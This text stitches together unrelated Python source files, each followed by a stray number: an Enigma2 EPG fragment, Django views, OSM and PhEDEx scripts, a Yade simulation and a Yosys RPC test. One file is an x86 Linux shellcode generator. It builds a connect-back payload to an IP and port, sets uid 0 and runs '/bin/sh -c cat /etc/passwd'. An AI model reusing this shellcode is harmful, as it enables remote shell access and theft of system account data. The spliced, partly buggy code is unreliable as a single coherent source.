        self['list'+str(self.activeList)].moveTo(self['list'+str(self.activeList)].instance.moveTop)
        ev_begin = self.getEventTime(self.activeList)[0]
        if ev_begin is not None and ev_begin > self.ask_time:
            self.ask_time += oneDay
        self.updateVerticalEPG()
        self.saveLastEventTime()
        return
    ev_begin, ev_end = self.getEventTime(self.activeList)
    if ev_begin is None:
        return
    for list in range(1, self.Fields):
        idx += self['list'+str(list)].getCurrentIndex()
    primetime = self.setPrimetime(ev_begin)
    onlyPT = False #key press primetime always sync
    gotoNow = False #False -> -24h List expanded, True -> got to current event and sync (onlyPT must set to False!)
    rPM = self.isInTimeRange(primetime-oneDay)
    rPT = self.isInTimeRange(primetime)
    rPP = self.isInTimeRange(primetime+oneDay)
    if rPM or rPT or rPP:
        if onlyPT or idx or not (primetime >= ev_begin and primetime < ev_end): #not sync or not primetime:
            if rPT:
                self.ask_time = primetime
            elif rPP:
                self.ask_time = primetime + oneDay
            elif rPM:
                self.ask_time = primetime - oneDay
            self.updateVerticalEPG(True)
        else:
            if gotoNow:
                self.gotoNow()
                return
    else:
        # Primetime not in the loaded range: widen the window, then search
        # each column for the primetime event.
        self['list'+str(self.activeList)].moveTo(self['list'+str(self.activeList)].instance.moveTop)
        self.setMinus24h(True, 6)
        for list in range(1, self.Fields):
            self['list'+str(list)].moveTo(self['list'+str(list)].instance.moveEnd)
            cnt = self['list'+str(list)].getCurrentIndex()
            self['list'+str(list)].moveTo(self['list'+str(list)].instance.moveTop)
            self.findPrimetime(cnt, list, primetime)
    self.saveLastEventTime()

def gotoLasttime(self, list = 0):
    """Restore each column's cursor to the last-remembered event time."""
    if list:
        self['list'+str(list)].moveTo(self['list'+str(list)].instance.moveEnd)
        cnt = self['list'+str(list)].getCurrentIndex()
        self['list'+str(list)].moveTo(self['list'+str(list)].instance.moveTop)
        self.findLasttime(cnt, list)
    else:
        for list in range(1, self.Fields):
            self['list'+str(list)].moveTo(self['list'+str(list)].instance.moveEnd)
            cnt = self['list'+str(list)].getCurrentIndex()
            self['list'+str(list)].moveTo(self['list'+str(list)].instance.moveTop)
            # NOTE(review): this method continues past the end of the visible chunk.
self.findLasttime(cnt, list) def findLasttime(self, cnt, list, idx = 0): last_begin, last_end = self.lastEventTime for events in range(0, idx): self['list'+str(list)].moveTo(self['list'+str(list)].instance.moveDown) for events in range(idx, cnt): ev_begin, ev_end = self.getEventTime(list) if ev_begin is not None: if (ev_begin <= last_begin and ev_end > last_begin) or (ev_end >= last_end): break self['list'+str(list)].moveTo(self['list'+str(list)].instance.moveDown) else: break def findPrimetime(self, cnt, list, primetime): for events in range(0, cnt): ev_begin, ev_end = self.getEventTime(list) if ev_begin is not None: if (primetime >= ev_begin and primetime < ev_end): break self['list'+str(list)].moveTo(self['list'+str(list)].instance.moveDown) else: break def saveLastEventTime(self, list = 0): if not list: list = self.activeList now = time() last = self.lastEventTime self.lastEventTime = self.getEventTime(list) if self.lastEventTime[0] is None and last[0] is not None: self.lastEventTime = last elif last[0] is None: self.lastEventTime = (now, now+3600) def getEventTime(self, list): tmp = self['list'+str(list)].l.getCurrentSelection() if tmp is None: return None, None return tmp[2], tmp[2]+tmp[3] #event begin, event end class SingleEPG(EPGSelection): def __init__(self, session, service, EPGtype="single"): EPGSelection.__init__(self, session, service=service, EPGtype=EPGtype) self.skinName = 'EPGSelection'
0.026297
""" Interface and plugin getter for LSH algorithm hash generation functors. """ import abc import os from smqtk.algorithms import SmqtkAlgorithm from smqtk.utils import plugin __author__ = "paul.tunison@kitware.com" class LshFunctor (SmqtkAlgorithm): """ Locality-sensitive hashing functor interface. The aim of such a function is to be able to generate hash codes (bit-vectors) such that similar items map to the same or similar hashes with a high probability. In other words, it aims to maximize hash collision for similar items. **Building Models** Some hash functions want to build a model based on some training set of descriptors. Due to the non-standard nature of algorithm training and model building, please refer to the specific implementation for further information on whether model training is needed and how it is accomplished. """ @abc.abstractmethod def get_hash(self, descriptor): """ Get the locality-sensitive hash code for the input descriptor. :param descriptor: Descriptor vector we should generate the hash of. :type descriptor: numpy.ndarray[float] :return: Generated bit-vector as a numpy array of booleans. :rtype: numpy.ndarray[bool] """ def get_lsh_functor_impls(reload_modules=False): """ Discover and return discovered ``LshFunctor`` classes. Keys in the returned map are the names of the discovered classes, and the paired values are the actual class type objects. We search for implementation classes in: - modules next to this file this function is defined in (ones that begin with an alphanumeric character), - python modules listed in the environment variable :envvar:`LSH_FUNCTOR_PATH` - This variable should contain a sequence of python module specifications, separated by the platform specific PATH separator character (``;`` for Windows, ``:`` for unix) Within a module we first look for a helper variable by the name ``LSH_FUNCTOR_CLASS``, which can either be a single class object or an iterable of class objects, to be specifically exported. 
If the variable is set to None, we skip that module and do not import anything. If the variable is not present, we look at attributes defined in that module for classes that descend from the given base class type. If none of the above are found, or if an exception occurs, the module is skipped. :param reload_modules: Explicitly reload discovered modules from source. :type reload_modules: bool :return: Map of discovered class object of type :class:`.LshFunctor` whose keys are the string names of the classes. :rtype: dict[str, type] """ this_dir = os.path.abspath(os.path.dirname(__file__)) env_var = "LSH_FUNCTOR_PATH" helper_var = "LSH_FUNCTOR_CLASS" return plugin.get_plugins(__name__, this_dir, env_var, helper_var, LshFunctor, reload_modules=reload_modules)
0
import json from django.http import HttpResponse from django.shortcuts import get_object_or_404, render from mobility.decorators import mobile_template from kitsune.products.models import Product, Topic from kitsune.wiki.facets import topics_for, documents_for @mobile_template('products/{mobile/}products.html') def product_list(request, template): """The product picker page.""" products = Product.objects.filter(visible=True) return render(request, template, { 'products': products}) @mobile_template('products/{mobile/}product.html') def product_landing(request, template, slug): """The product landing page.""" product = get_object_or_404(Product, slug=slug) if request.is_ajax(): # Return a list of topics/subtopics for the product topic_list = list() for t in Topic.objects.filter(product=product, visible=True): topic_list.append({'id': t.id, 'title': t.title}) return HttpResponse(json.dumps({'topics': topic_list}), mimetype='application/json') versions = product.versions.filter(default=True) if versions: latest_version = versions[0].min_version else: latest_version = 0 return render(request, template, { 'product': product, 'products': Product.objects.filter(visible=True), 'topics': topics_for(products=[product], parent=None), 'search_params': {'product': slug}, 'latest_version': latest_version }) @mobile_template('products/{mobile/}documents.html') def document_listing(request, template, product_slug, topic_slug, subtopic_slug=None): """The document listing page for a product + topic.""" product = get_object_or_404(Product, slug=product_slug) topic = get_object_or_404(Topic, slug=topic_slug, product=product, parent__isnull=True) doc_kw = {'locale': request.LANGUAGE_CODE, 'products': [product]} if subtopic_slug is not None: subtopic = get_object_or_404(Topic, slug=subtopic_slug, product=product, parent=topic) doc_kw['topics'] = [subtopic] else: subtopic = None doc_kw['topics'] = [topic] documents, fallback_documents = documents_for(**doc_kw) return render(request, 
template, { 'product': product, 'topic': topic, 'subtopic': subtopic, 'topics': topics_for(products=[product], parent=None), 'subtopics': topics_for(products=[product], parent=topic), 'documents': documents, 'fallback_documents': fallback_documents, 'search_params': {'product': product_slug}})
0
#!/usr/bin/python # -*- coding: utf8 -*- import os import psycopg2 import time import config import argparse def download_osm(): import urllib urllib.urlretrieve ('''http://overpass.osm.rambler.ru/cgi/interpreter?data=[timeout:86400];relation["route"="tram"](55.67,23.12,57.59,27.88);(._;>;);out meta;''', "data.osm") def argparser_prepare(): class PrettyFormatter(argparse.ArgumentDefaultsHelpFormatter, argparse.RawDescriptionHelpFormatter): max_help_position = 35 parser = argparse.ArgumentParser(description='', formatter_class=PrettyFormatter) parser.add_argument('--download', dest='download', action='store_true') parser.add_argument('--no-download', dest='download', action='store_false') parser.set_defaults(download=True) parser.epilog = \ '''Samples: %(prog)s --download %(prog)s --no-download ''' \ % {'prog': parser.prog} return parser def cleardb(host,dbname,user,password): ConnectionString="dbname=" + dbname + " user="+ user + " host=" + host + " password=" + password try: conn = psycopg2.connect(ConnectionString) except: print 'I am unable to connect to the database ' print ConnectionString return 0 cur = conn.cursor() sql =''' DROP TABLE IF EXISTS planet_osm_buildings CASCADE; DROP TABLE IF EXISTS planet_osm_line CASCADE; DROP TABLE IF EXISTS planet_osm_nodes CASCADE; DROP TABLE IF EXISTS planet_osm_point CASCADE; DROP TABLE IF EXISTS planet_osm_polygon CASCADE; DROP TABLE IF EXISTS planet_osm_rels CASCADE; DROP TABLE IF EXISTS planet_osm_roads CASCADE; DROP TABLE IF EXISTS planet_osm_ways CASCADE; DROP TABLE IF EXISTS route_line_labels CASCADE; DROP TABLE IF EXISTS routes_with_refs CASCADE; DROP TABLE IF EXISTS terminals CASCADE; DROP TABLE IF EXISTS terminals_export CASCADE; ''' cur.execute(sql) conn.commit() def importdb(host,dbname,user,password): os.system(''' osm2pgsql --create --slim -E 3857 --database '''+dbname+''' --username '''+user+''' data.osm ''') def process(host,dbname,user,password): cmd='''python ../../osmot.py -hs localhost -d '''+dbname+''' 
-u '''+user+''' -p '''+password+''' ''' print cmd os.system(cmd) def postgis2geojson(host,dbname,user,password,table): os.system(''' ogr2ogr -f GeoJSON '''+table+'''.geojson \ "PG:host='''+host+''' dbname='''+dbname+''' user='''+user+''' password='''+password+'''" "'''+table+'''" ''') if __name__ == '__main__': host=config.host dbname=config.dbname user=config.user password=config.password parser = argparser_prepare() args = parser.parse_args() is_download = args.download if is_download == True: print "downloading" download_osm() cleardb(host,dbname,user,password) importdb(host,dbname,user,password) process(host,dbname,user,password) postgis2geojson(host,dbname,user,password,'terminals_export') postgis2geojson(host,dbname,user,password,'routes_with_refs')
0.03688
from struct import pack import sys import binascii ########################################################## # # 1. connect to IP:PORT # 2. Run binfile with paramters if given # # random 2014-04-21 ########################################################## ########################################################## des_format = 'shellcode: connect to %s:%s && %s %s' IP = '127.0.0.3' PORT = 5555 BIN_FILE = '/bin/sh' PARAMETERS = ['-c','cat /etc/passwd'] ALIGN = 4 UID = 0 ########################################################## def out_format(language): if language=='c': des = '\n\n/*\n* '+ des_format +'\n*/' elif language=='python': des = '\n\n# '+ des_format +' #' elif language=='perl': des = '\n\n# '+ des_format +' #' else: return print des % (IP,PORT,BIN_FILE,PARAMETERS) #padding FilePath with '/' by 4 bytes aligned def PaddingFilepath(binpath, align = ALIGN): newpath = '' sub_path = binpath.split('/') for p in sub_path: if len(p): newpath = newpath + (align - len(p) % align) * '/' + p return newpath def init_regs_shellcode(): shellcode = '' #init shellcode += '\x31\xc0\x31\xd2\x31\xdb\x31\xc9' #xor eax,eax#xor edx,edx#xor ebx,ebx#xor ecx,ecx return shellcode def build_sockaddr_shellcode(ip, port): ''' struct sockaddr { sa_family_t sa_family; char sa_data[14]; } ''' shellcode = '' shellcode += '\x31\xc0' #xor eax,eax shellcode += '\x50' #push eax shellcode += '\x50' #push eax if ip == '0.0.0.0': shellcode += '\x50' #push eax else: #push IP zero_arr = [0,0,0,0] ip_value = 0 ip = ip.split('.')[::-1] print ip for i in xrange(len(ip)): p = int(ip[i]) if p == 0: p = p + 1 zero_arr[i] = 1 ip_value += p <<8*(i) print ip_value #push ip shellcode += "\x68" #push shellcode += pack('>I',(ip_value)) #ip field for i in xrange(len(zero_arr)): if zero_arr[i] == 1: shellcode += '\xfe\x4c\x24' + pack('B',(i)) #dec byte [esp+i] #push port shellcode += '\x66\x68' #pushw shellcode += pack('>H',(port)) #ip field #host order is big endian shellcode += '\xb0\x02' #sa_family = AF_INET 
= 2 shellcode += '\x66\x50' #pushw %ax #shellcode += '\x89\xe0' #mov %esp,%eax return shellcode def setuid_shellcode(userid): shellcode = '' shellcode += '\x31\xc0' #xor eax,eax shellcode += '\x31\xdb' #xor ebx,ebx if (userid <= 0): pass elif (userid <= 0xff): shellcode += '\xb3' + pack('B',userid) #mov bl,UID elif (userid > 0xff): if not (userid & 0xFF): shellcode += '\x66\xbb' + pack('H',userid+1) #mov bx,(UID+1) shellcode += '\x66\x4b' #dec bx else: shellcode += '\x66\xbb' + pack('H',userid) #mov bx,(UID) shellcode += '\xb0\x17' #mov ax,0x17 shellcode += '\xcd\x80' #int 0x80 -----> setuid(UID) return shellcode def exec_shellcode(binpath,parameters): if len(binpath) % ALIGN : binpath = PaddingFilepath(binpath) strlen = len(binpath) cnt = strlen / ALIGN shellcode = '' #call execve(binpath,[binpath,arg1,arg2,...],NULL) shellcode += '\x31\xc0' #xor eax,eax shellcode += '\x31\xd2\x52' #xor edx,edx#push edx ---> null bytes #push binpath binpath = binpath[::-1] #reverse str for i in xrange(cnt): #push binpath shellcode += '\x68' #push opcode shellcode += binpath[i*ALIGN:(i+1)*ALIGN][::-1] #reverse shellcode += '\x89\xe3' #mov ebx,esp #ebx store the first argv for execve #build the second argv for execve shellcode += '\x52' #push edx ---> as null bytes cnt = len(parameters) if cnt: shellcode += '\x83\xec' + pack('B',(cnt*4) + 4) #sub esp,cnt*4 shellcode += '\x89\xe1' #mov ecx, esp ecx= esp #ecx store the second argv for execve for i in xrange(cnt): p = parameters[i][::-1] l = len(p) c = l / 2 r = l % 2 shellcode += '\x52' #push edx ---> as null bytes for j in xrange(c): shellcode += '\x66\xb8' #mov ax shellcode += p[j*2:(j+1)*2][::-1] shellcode += '\x66\x50' #push ax if r: shellcode += '\x31\xc0' #xor eax,eax shellcode += '\xb4' + p[l-1] #mov ah,p[_len-1] shellcode += '\x66\x50' #push ax shellcode += '\x44' #inc esp shellcode += "\x89\xe0" #mov eax,esp shellcode += '\x89\x41' + pack('B',((i+1)*4)) #mov [ecx+(i+1)*4],eax shellcode += '\x89\x19' #mov [ecx],ebx else: 
shellcode += '\x53' #push ebx shellcode += '\x89\xe1' #mov ecx, esp ecx= esp shellcode += '\x31\xc0' #xor eax,eax shellcode += '\xb0\x0b' #mov al,0x0b # execve call num shellcode += '\xcd\x80' #int 0x80 #call exit() #shellcode += '\x31\xc0\x31\xdb\x40\xcd\x80' return shellcode def connect_back_shellcode(ip,port,binpath,parameters=[]): if (not port & 0xFF) or \ (not port>>8 & 0xFF) : print 'port contains null bytes' exit(0) #sock() shellcode += '\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x50\x6a\x01\x6a\x02\x89\xe1\xb3\x01\xb0\x66\xcd\x80\x89\xc6' #connect() shellcode += build_sockaddr_shellcode(ip, port) shellcode += '\x89\xe1\x6a\x10\x51\x56\x89\xe1\xb3\x03\xb0\x66\xcd\x80' #call dup2(sockfd,0) dup2(sockfd,1) dup2(sockfd,2) shellcode += '\x89\xf3\x31\xc9\xb0\x3f\xcd\x80\x41\xb0\x3f\xcd\x80\x41\xb0\x3f\xcd\x80' #call execve(binpath,[binpath,arg1,arg2,...],NULL) shellcode += exec_shellcode(binpath,parameters) #call exit() #shellcode += '\x31\xc0\x31\xdb\x40\xcd\x80' return shellcode def getshellcode(language, shellcode): new_shellcode = '' if language == 'bin': new_shellcode = shellcode sys.stdout.write(new_shellcode) if language == 'c': sys.stdout.write("\nchar shellcode[] = \\\n\"") for i in xrange(len(shellcode)): tmp = '\\'+ str(hex(ord(shellcode[i])))[1:] new_shellcode += tmp sys.stdout.write(tmp) if not (i+1) % 16 : sys.stdout.write("\"\n\"") sys.stdout.write("\";\n\n\n") if language == 'perl': pass if language == 'python': pass if __name__ == '__main__': #language = 'bin' language = 'c' shellcode = '' shellcode += init_regs_shellcode() shellcode += setuid_shellcode(UID) shellcode += connect_back_shellcode(ip=IP, port=PORT, binpath=BIN_FILE, parameters=PARAMETERS) out_format(language) getshellcode(language, shellcode)
0.048721
from yade import plot, polyhedra_utils gravel = PolyhedraMat() gravel.density = 2600 #kg/m^3 gravel.Ks = 20000 gravel.Kn = 1E7 #Pa gravel.frictionAngle = 0.5 #rad steel = PolyhedraMat() steel.density = 7850 #kg/m^3 steel.Ks = 10*gravel.Ks steel.Kn = 10*gravel.Kn steel.frictionAngle = 0.4 #rad rubber = PolyhedraMat() rubber.density = 1000 #kg/m^3 rubber.Ks = gravel.Ks/10 rubber.Kn = gravel.Kn/10 rubber.frictionAngle = 0.7 #rad O.bodies.append(polyhedra_utils.polyhedra(gravel,v=((0,0,-0.05),(0.3,0,-0.05),(0.3,0.3,-0.05),(0,0.3,-0.05),(0,0,0),(0.3,0,0),(0.3,0.3,0),(0,0.3,0)),fixed=True, color=(0.35,0.35,0.35))) #O.bodies.append(utils.wall(0,axis=1,sense=1, material = gravel)) #O.bodies.append(utils.wall(0,axis=0,sense=1, material = gravel)) #O.bodies.append(utils.wall(0.3,axis=1,sense=-1, material = gravel)) #O.bodies.append(utils.wall(0.3,axis=0,sense=-1, material = gravel)) polyhedra_utils.fillBox((0,0,0), (0.3,0.3,0.3),gravel,sizemin=[0.025,0.025,0.025],sizemax=[0.05,0.05,0.05],seed=4) def checkUnbalancedI(): print "iter %d, time elapsed %f, time step %.5e, unbalanced forces = %.5f"%(O.iter, O.realtime, O.dt, utils.unbalancedForce()) O.engines=[ ForceResetter(), InsertionSortCollider([Bo1_Polyhedra_Aabb(),Bo1_Wall_Aabb(),Bo1_Facet_Aabb()]), InteractionLoop( [Ig2_Wall_Polyhedra_PolyhedraGeom(), Ig2_Polyhedra_Polyhedra_PolyhedraGeom(), Ig2_Facet_Polyhedra_PolyhedraGeom()], [Ip2_PolyhedraMat_PolyhedraMat_PolyhedraPhys()], # collision "physics" [PolyhedraVolumetricLaw()] # contact law -- apply forces ), #GravityEngine(gravity=(0,0,-9.81)), NewtonIntegrator(damping=0.3,gravity=(0,0,-9.81)), PyRunner(command='checkUnbalancedI()',realPeriod=5,label='checker') ] #O.dt=0.25*polyhedra_utils.PWaveTimeStep() O.dt=0.0025*polyhedra_utils.PWaveTimeStep() from yade import qt qt.Controller() V = qt.View() V.screenSize = (550,450) V.sceneRadius = 1 V.eyePosition = (0.7,0.5,0.1) V.upVector = (0,0,1) V.lookAt = (0.15,0.15,0.1)
0.045319
#!/usr/bin/env python import os #################################################################################################### ### Settings class ################################################################################# #################################################################################################### class settings: def __init__( self ): # file index number self.i_file=0 ## settings # list: values to be set # prio: sequence of the different settings ## # Vbb self.vbb_list=[] self.vbb_prio=[] # Vrst self.vrst_list=[] self.vrst_prio=[] # Vcasn self.vcasn_list=[[]] self.vcasn_prio=[] # Vcasn self.vcasn_list=[] self.vcasn_prio=[] # Ithr self.ithr_list=[] self.ithr_prio=[] # Vlight self.vlight_list=[] self.vlight_prio=[] # Acq_time self.acq_time_list=[] self.acq_time_prio=[] # Trig_delay self.trig_delay_list=[] self.trig_delay_prio=[] def generate_files( self ): for i_vbb in range(len(self.vbb_prio)): vbb_index=self.vbb_prio[i_vbb] vbb=self.vbb_list[vbb_index] for i_vrst in range(len(self.vrst_prio)): vrst=self.vrst_list[self.vrst_prio[i_vrst]] for i_vcasn in range(len(self.vcasn_prio)): vcasn=self.vcasn_list[vbb_index][self.vcasn_prio[i_vcasn]] for i_vcasp in range(len(self.vcasp_prio)): vcasp=self.vcasp_list[self.vcasp_prio[i_vcasp]] for i_ithr in range(len(self.ithr_prio)): ithr=self.ithr_list[self.ithr_prio[i_ithr]] for i_vlight in range(len(self.vlight_prio)): vlight=self.vlight_list[self.vlight_prio[i_vlight]] for i_acq_time in range(len(self.acq_time_list)): acq_time=self.acq_time_list[self.acq_time_prio[i_acq_time]] for i_trig_delay in range(len(self.trig_delay_list)): trig_delay=self.trig_delay_list[self.trig_delay_prio[i_trig_delay]] args =(self.i_file, vbb, vrst, vcasn, vcasp, ithr, vlight, acq_time, trig_delay) cmd ="/bin/bash conf_gen_helper.sh %d %f %f %f %f %f %f %f %f"%args os.system(cmd) self.i_file+=1 #################################################################################################### 
#################################################################################################### s=settings() #### load the standard settings # Vbb (V) s.vbb_list=[ 0, 0.5, 1, 2, 3, 4, 5, 6 ] s.vbb_prio=[ 0, 3, 2, 4, 1, 5, 6 ] # Vrst (V) s.vrst_list=[ 1.6 ] s.vrst_prio=[ 0 ] # back-bias dependent Vcasn (V) # Vbb: s.vcasn_list=[[ 0.40, 0.50, 0.60 ], # 0.0 V [ 0.60, 0.70, 0.75 ], # 0.5 V [ 0.70, 0.80, 0.90 ], # 1.0 V [ 0.90, 1.05, 1.10 ], # 2.0 V [ 1.00, 1.10, 1.20 ], # 3.0 V [ 1.20, 1.30, 1.40 ], # 4.0 V [ 1.35, 1.40, 1.45 ], # 5.0 V [ 1.40, 1.45, 1.50 ]] # 6.0 V s.vcasn_prio=[ 0, 1, 2 ] # Vcasp (V) s.vcasp_list=[ 0.6 ] s.vcasp_prio=[ 0 ] # Ithr (uA) s.ithr_list=[ 1.02, 1.54, 2.05, 2.87 ] s.ithr_prio=[ 2, 0, 1, 3 ] # Vlight (V) s.vlight_list=[ 0., 10.25 ] s.vlight_prio=[ 0, 1 ] # Acq_time s.acq_time_list=[ 1.54 ] s.acq_time_prio=[ 0 ] # Trig_delay s.trig_delay_list=[ 0. ] s.trig_delay_prio=[ 0 ] ### apply modifications # no light standard s.vlight_prio=[ 0 ] s.acq_time_list=[ 3. ] s.generate_files() # scientific light s.vlight_prio=[ 1 ] s.generate_files() # delay scan s.vlight_prio=[ 0 ] s.vbb_prio=[ 0, 3 ] s.ithr_prio=[ 2, 0 ] s.trig_delay_list=[ 0. ] s.trig_delay_prio=[ 0 ] s.ithr_prio=[ 2, 0 ] s.vcasn_prio=[ 0 ] s.trig_delay_list=[ 1., 2., 3., 4., 5., 6., 7., 8., 9. ] s.trig_delay_prio=[ 0, 1, 2, 3, 4, 5, 6, 7, 8 ] s.generate_files() # delay scan with light s.trig_delay_list=[ 1., 2., 3., 4., 5., 6., 7. ] s.trig_delay_prio=[ 0, 1, 2, 3, 4, 5, 6 ] s.vlight_prio=[ 1 ] s.generate_files() # fine delay scan s.acq_time_list=[ 1.54 ] s.trig_delay_list=[ 0.0, 0.5, 1.0, 1.5, 2.0, 2.5, 3.0, 3.5, 4.0, 4.5, 5.0, 5.5, 6. ] s.trig_delay_prio=[ 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12 ] s.generate_files() # fine delay scan without light s.vlight_prio=[ 0 ] s.generate_files() print "%d config files produced" % s.i_file print "Estimated measurement time %d min (%0.1f h) assuming 7.5 min per config file" % (s.i_file*7.5, s.i_file*7.5/60.)
0.035765
#!/usr/bin/env python import sys,getopt,urllib2,json,time year=32000000 # a bit more but good enough ayearago=int(time.time())-year*3 def sites(dataset): sitelist={} # pull block info down from datasvc # if "#" is in the thing its a block, so do different arguments if "#" in dataset: dsQueryUrl='https://cmsweb.cern.ch/phedex/datasvc/json/prod/blockreplicas?block=' else: dsQueryUrl='https://cmsweb.cern.ch/phedex/datasvc/json/prod/blockreplicas?dataset=' # use urllib2.quote to settle the # in the block if its there fullQueryUrl=dsQueryUrl+urllib2.quote(dataset) # print fullQueryUrl queryResult=urllib2.urlopen(fullQueryUrl).read() queryResult = queryResult.replace("\n", " ") queryJSON = json.loads(queryResult) # Now have dict full of stuff dssize=0.0 for block in queryJSON['phedex']['block']: dssize+=block['bytes'] # print block for replica in block['replica']: #print replica['node'] if replica['node'] not in sitelist.keys(): sitelist[replica['node']]=0 # if replica['complete'] == 'y': sitelist[replica['node']] += replica['bytes'] for site in sitelist.keys(): if dssize>0: sitelist[site]=sitelist[site]/dssize return sitelist def replicabytes(dataset): sitelist={} # pull block info down from datasvc # if "#" is in the thing its a block, so do different arguments if "#" in dataset: dsQueryUrl='https://cmsweb.cern.ch/phedex/datasvc/json/prod/blockreplicas?block=' else: dsQueryUrl='https://cmsweb.cern.ch/phedex/datasvc/json/prod/blockreplicas?dataset=' # print dataset # use urllib2.quote to settle the # in the block if its there fullQueryUrl=dsQueryUrl+urllib2.quote(dataset) # print fullQueryUrl queryResult=urllib2.urlopen(fullQueryUrl).read() queryResult = queryResult.replace("\n", " ") queryJSON = json.loads(queryResult) # Now have dict full of stuff replicalist={} dssize=0.0 repsize=0.0 for block in queryJSON['phedex']['block']: dssize+=block['bytes'] for replica in block['replica']: #print replica['node'] if replica['node'] not in replicalist.keys(): 
replicalist[replica['node']]=0 # if replica['complete'] == 'y': replicalist[replica['node']] += replica['bytes'] return replicalist def blockcompareJSON(siteA,siteB): blocklist={} stQueryUrl='https://cmsweb.cern.ch/phedex/datasvc/json/prod/blockreplicacompare?' fullQueryUrl=stQueryUrl+'a='+siteA+'&b='+siteB queryResult=urllib2.urlopen(fullQueryUrl).read() queryResult = queryResult.replace("\n", " ") queryJSON = json.loads(queryResult) return queryJSON def missingfilesJSON(block,site): filelist={} # get missing files for a block at a site stQueryUrl='https://cmsweb.cern.ch/phedex/datasvc/json/prod/missingfiles?' fullQueryUrl=stQueryUrl+'block='+urllib2.quote(block)+'&node='+site queryResult=urllib2.urlopen(fullQueryUrl).read() queryResult = queryResult.replace("\n", " ") queryJSON = json.loads(queryResult) return queryJSON def blocksJSON(site): blocklist={} # get blocks living at a site stQueryUrl='https://cmsweb.cern.ch/phedex/datasvc/json/prod/blockreplicas?node=' fullQueryUrl=stQueryUrl+site queryResult=urllib2.urlopen(fullQueryUrl).read() queryResult = queryResult.replace("\n", " ") queryJSON = json.loads(queryResult) return queryJSON def allSubscriptions(site="T3_US_FNALLPC",since=ayearago): subslist={} # get all subscriptions since forever from a site stQueryUrl='https://cmsweb.cern.ch/phedex/datasvc/json/prod/subscriptions?node='+site+'&create_since='+str(since) queryResult=urllib2.urlopen(stQueryUrl).read() queryResult = queryResult.replace("\n", " ") queryJSON = json.loads(queryResult) return queryJSON def allDeletionRequests(site): dellist={} # pull down all open deletion requests for a site stQueryUrl="https://cmsweb.cern.ch/phedex/datasvc/json/prod/deleterequests?node="+site+"&create_since="+str(ayearago)+"&approval=pending" queryResult=urllib2.urlopen(stQueryUrl).read() queryResult = queryResult.replace("\n", " ") queryJSON = json.loads(queryResult) return queryJSON if __name__ == '__main__': 
testsitelist=sites("/MinBias_TuneA2MB_13TeV-pythia8/Fall13-POSTLS162_V1-v1/GEN-SIM") for site in testsitelist.keys(): print "Site: %25s Complete %.1f " % (site,testsitelist[site] * 100.0) testJSON=blocksJSON("T3_US_FNALLPC") print testJSON
0.039648
def modules():
    """Return the list of module names this RPC frontend can derive."""
    return ["python_inv"]


def derive(module, parameters):
    """Derive an implementation of *module* for *parameters*.

    Returns a ``(frontend, source)`` pair understood by Yosys'
    ``connect_rpc``; raises ValueError when the parameter set is not
    exactly ``{\\width}``.
    """
    assert module == r"python_inv"
    if parameters.keys() != {r"\width"}:
        raise ValueError("Invalid parameters")
    # NOTE(review): the ilang template below was re-flowed onto separate
    # lines (the visible source had its newlines collapsed); ilang is a
    # newline-separated format, one statement per line.
    return "ilang", r"""
module \impl
  wire width {width:d} input 1 \i
  wire width {width:d} output 2 \o
  cell $neg $0
    parameter \A_SIGNED 1'0
    parameter \A_WIDTH 32'{width:b}
    parameter \Y_WIDTH 32'{width:b}
    connect \A \i
    connect \Y \o
  end
end
module \python_inv
  wire width {width:d} input 1 \i
  wire width {width:d} output 2 \o
  cell \impl $0
    connect \i \i
    connect \o \o
  end
end
""".format(width=parameters[r"\width"])

# ----------------------------------------------------------------------------

import json
import argparse
import sys, socket, os, subprocess
try:
    import msvcrt, win32pipe, win32file
except ImportError:
    # Not on Windows; the named-pipe mode is simply unavailable.
    msvcrt = win32pipe = win32file = None


def map_parameter(parameter):
    """Convert one RPC parameter description ({"type": ..., "value": ...})
    to the corresponding Python value.  Binary strings encode integers."""
    if parameter["type"] == "unsigned":
        return int(parameter["value"], 2)
    if parameter["type"] == "signed":
        width = len(parameter["value"])
        value = int(parameter["value"], 2)
        # Sign-extend: if the MSB is set, interpret as two's complement.
        if value & (1 << (width - 1)):
            value = -((1 << width) - value)
        return value
    if parameter["type"] == "string":
        return parameter["value"]
    if parameter["type"] == "real":
        return float(parameter["value"])
    # Fix: previously fell through returning None, which later crashed
    # inside derive()'s .format() call; raise instead so call() turns it
    # into a clean {"error": ...} reply.
    raise ValueError("Unsupported parameter type {!r}".format(parameter["type"]))


def call(input_json):
    """Dispatch one JSON-encoded RPC request and return the JSON reply.

    Returns None for unknown methods (unchanged from the original).
    """
    input = json.loads(input_json)
    if input["method"] == "modules":
        return json.dumps({"modules": modules()})
    if input["method"] == "derive":
        try:
            frontend, source = derive(input["module"],
                {name: map_parameter(value) for name, value in input["parameters"].items()})
            return json.dumps({"frontend": frontend, "source": source})
        except ValueError as e:
            return json.dumps({"error": str(e)})


def main():
    """Serve RPC requests over stdio, a unix socket, or a named pipe."""
    parser = argparse.ArgumentParser()
    modes = parser.add_subparsers(dest="mode")
    mode_stdio = modes.add_parser("stdio")
    if os.name == "posix":
        mode_path = modes.add_parser("unix-socket")
    if os.name == "nt":
        mode_path = modes.add_parser("named-pipe")
    mode_path.add_argument("path")
    args = parser.parse_args()

    if args.mode == "stdio":
        # One newline-terminated JSON request per line; EOF terminates.
        while True:
            input = sys.stdin.readline()
            if not input:
                break
            sys.stdout.write(call(input) + "\n")
            sys.stdout.flush()

    if args.mode == "unix-socket":
        sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
        sock.settimeout(30)
        sock.bind(args.path)
        # Fix: define ys_proc before the try block so the finally clause
        # cannot raise NameError (masking the real error) when listen() or
        # Popen() fails.
        ys_proc = None
        try:
            sock.listen(1)
            ys_proc = subprocess.Popen(["../../yosys", "-ql", "unix.log",
                "-p", "connect_rpc -path {}; read_verilog design.v; hierarchy -top top; flatten; select -assert-count 1 t:$neg".format(args.path)])
            conn, addr = sock.accept()
            file = conn.makefile("rw")
            while True:
                input = file.readline()
                if not input:
                    break
                file.write(call(input) + "\n")
                file.flush()
            ys_proc.wait(timeout=10)
            if ys_proc.returncode:
                raise subprocess.CalledProcessError(ys_proc.returncode, ys_proc.args)
        finally:
            if ys_proc is not None:
                ys_proc.kill()
            sock.close()
            os.unlink(args.path)

    if args.mode == "named-pipe":
        pipe = win32pipe.CreateNamedPipe(args.path, win32pipe.PIPE_ACCESS_DUPLEX,
